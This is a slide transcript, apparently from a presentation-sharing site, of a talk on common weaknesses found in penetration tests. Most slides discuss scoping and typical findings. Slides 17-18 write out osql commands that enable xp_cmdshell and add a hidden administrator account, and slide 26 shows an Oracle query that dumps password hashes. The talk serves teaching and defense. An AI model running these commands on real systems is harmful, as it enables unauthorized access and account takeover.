1 / 53

The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller

The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller. AGENDA. Pen Testing vs. VA vs. Risk Assessments Penetration Testing Concepts/Issues What is Low Hanging Fruit Low Hanging Fruit Examples Wrap Up. B.S. I.S., M.S. C.S. – Virginia Commonwealth University

december
Download Presentation

The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller

  2. AGENDA • Pen Testing vs. VA vs. Risk Assessments • Penetration Testing Concepts/Issues • What is Low Hanging Fruit • Low Hanging Fruit Examples • Wrap Up The Low Hanging Fruit of Penetration Testing

  3. B.S. I.S., M.S. C.S. – Virginia Commonwealth University • Current CISSP, former Banyan CBE & Cisco CCIE • Former adjunct professor – I.S. & C.S. – VCU • ISSA, ISACA, IALR and VA SCAN lecturer • Penetration testing for 11+ years • Published author with 25 years in I.T. The Low Hanging Fruit of Penetration Testing

  4. Penetration Testing vs. Vulnerability Assessments vs. Risk Assessments The Low Hanging Fruit of Penetration Testing

  5. Penetration Testing • Tests for actual vulnerabilities and what can be exploited • Value add comes from putting the pieces together • Vulnerability Assessment • Reports on potential vulnerabilities without testing them • Assigns risk values to each issue • Risk Assessment • More analytical and less technical • Great for overviews but IMHO it will never catch LHF The Low Hanging Fruit of Penetration Testing

  6. Penetration Testing Concepts/Issues The Low Hanging Fruit of Penetration Testing

  7. Types of testing • External • Testing from outside the security perimeter (firewall) • Internet, dial-in, wireless, physical & social engineering • Usually performed in a black-box approach w/no credentials The Low Hanging Fruit of Penetration Testing

  8. Types of testing • Internal • What is accessible inside the security perimeter • White-box or black-box depending on goals • Tests for effects of automated malicious software The Low Hanging Fruit of Penetration Testing

  9. Issues - Requirements definition • Do you need a penetration test, VA or risk assessment? • Sometimes you may need more than one • What is the ultimate goal of the test? • Physical → Test security cameras, locks and alarms • Social Engineering → Test HR policies and procedures • Vulnerability Assessment → Patch scan • How do you define success? • How do you know if the test succeeded or failed? • Sometimes difficult to define for a penetration test The Low Hanging Fruit of Penetration Testing

  10. Issues - In-house or outsourced? • In-house • Keeping qualified staff happy is a tough job • Tools and training can be very expensive • Sometimes you just need an unbiased 2nd opinion • Outsourced • How do you judge competency? • Do they have a methodology, tool list, references? • Do they outsource their work? • Geography/vertical market coverage The Low Hanging Fruit of Penetration Testing

  11. Issues • Deliverables • Will the report include specific recommendations? • Is there tool output for verification? • No boilerplate text! • Remediation • If you don’t plan on fixing the issues, don’t waste the time or money performing the tests • Post-remediation testing • Critical to ensure that all issues have been resolved The Low Hanging Fruit of Penetration Testing

  12. What is Low Hanging Fruit? The Low Hanging Fruit of Penetration Testing

  13. The Low Hanging Fruit Top Ten • Permissions on data resources • Employee security awareness • Encryption • Policies & procedures • Physical security The Low Hanging Fruit of Penetration Testing

  14. The Low Hanging Fruit Top Ten • Password management • Default security controls • OS and application patches • SQL Injection, XSS, URL issues • Wireless access points/modems The Low Hanging Fruit of Penetration Testing

  15. Low Hanging Fruit Examples The Low Hanging Fruit of Penetration Testing

  16. The Low Hanging Fruit of Penetration Testing

  17. Fun with Microsoft SQL • Turn on “xp_cmdshell” if it’s disabled • osql –S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure 'show advanced options', 1" • osql –S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE" • osql –S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure ‘xp_cmdshell’, 1" • osql –S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE" The Low Hanging Fruit of Penetration Testing

  18. More Fun with Microsoft SQL • Add administrative user • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net user bmiller passwd /add'" • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net localgroup administrators bmiller /add'" The Low Hanging Fruit of Penetration Testing

  19. The Trouble with VNC The Low Hanging Fruit of Penetration Testing

  20. There are many ways to get the VNC password hashes… The Low Hanging Fruit of Penetration Testing

  21. The Low Hanging Fruit of Penetration Testing

  22. The Low Hanging Fruit of Penetration Testing

  23. The Low Hanging Fruit of Penetration Testing

  24. The Low Hanging Fruit of Penetration Testing

  25. The Low Hanging Fruit of Penetration Testing

  26. Fun with Oracle • Dumping password hashes – non-privileged account • Logged in as “dbsnmp”, we ran the following query: • select username, password from dba_users; • DBSNMP AE1E40C725DFCAC8 • AQADMIN 739EF27E22AC39DC • SYS C10A280B9CFF9A72 • SYSTEM 04D19DEFD642AF20 The Low Hanging Fruit of Penetration Testing

  27. Ran CheckPWD: The Low Hanging Fruit of Penetration Testing

  28. Reboot via Compaq Insight Manager (CIM) The Low Hanging Fruit of Penetration Testing

  29. The Low Hanging Fruit of Penetration Testing

  30. The Low Hanging Fruit of Penetration Testing

  31. The Low Hanging Fruit of Penetration Testing

  32. The Low Hanging Fruit of Penetration Testing

  33. The Low Hanging Fruit of Penetration Testing

  34. Appliances are not immune…. The Low Hanging Fruit of Penetration Testing

  35. Downloaded passwd, shadow, host files The Low Hanging Fruit of Penetration Testing

  36. The Low Hanging Fruit of Penetration Testing

  37. The Low Hanging Fruit of Penetration Testing

  38. The Low Hanging Fruit of Penetration Testing

  39. The Low Hanging Fruit of Penetration Testing

  40. The Low Hanging Fruit of Penetration Testing

  41. The Low Hanging Fruit of Penetration Testing

  42. The Low Hanging Fruit of Penetration Testing

  43. The Low Hanging Fruit of Penetration Testing

  44. The Low Hanging Fruit of Penetration Testing

  45. Looks like we can request any file? The Low Hanging Fruit of Penetration Testing

  46. OK, we’ll ask for the passwordfile. Next up, JTR! The Low Hanging Fruit of Penetration Testing

  47. This is why PCI doesn’t allow WEP The Low Hanging Fruit of Penetration Testing

  48. What the fake telephone repairman saw… The Low Hanging Fruit of Penetration Testing

  49. The danger of scripts laying around… The Low Hanging Fruit of Penetration Testing

  50. Wrap-Up The Low Hanging Fruit of Penetration Testing

More Related